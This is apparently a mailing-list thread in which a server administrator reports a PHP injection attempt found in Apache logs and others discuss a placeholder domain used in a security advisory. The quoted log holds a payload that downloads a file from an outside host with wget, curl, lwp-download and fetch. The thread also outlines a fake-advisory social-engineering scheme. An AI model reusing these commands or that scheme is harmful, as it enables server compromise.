Hi, while reading my Apache server logs I found this:
Message: Warning. Pattern match \\?(?!xml) at ARGS_NAMES:?php echo
Content-Type:text/html\\r\\n\\r\\n;echo OK\\n;system(cd
/tmp;wget http://sirgeox.tk/php.jpg;curl -O
http://sirgeox.tk/php.jpg;lwp-download http://sirgeox.tk/php.jpg;fetch
my action is supposed to be a counter-measure against bad guys who could
register that domain and host some bad code there. you know that kind of
social engineering, right?
- post some fake or real advisory on popular security forum/maillist
- give a link to the patch
-
- get a lot of roots
wget http://botslayer.ru/final_solution.txt
i've registered this domain just to save incompetent shitheads who blindly
run any code which is supposed to fix security problem. why have you
included the non-existent domain in your code?
thanks for your interesting investigation anyway.
What happened to the link?
On 6/8/13, kai k...@rhynn.net wrote:
wget http://botslayer.ru/final_solution.txt
i've registered this domain just to save incompetent shitheads who blindly
run any code which is supposed to fix security problem. why have you
included the non-existent domain in
We put that domain in as an example; obviously we do not disclose our real
domain. On that domain is the clean.pl script, obvious enough.
Also, thanks to the person who registered the domain, you now have a badass domain
name. Perhaps host the clean.pl as final_solution.txt in webroot?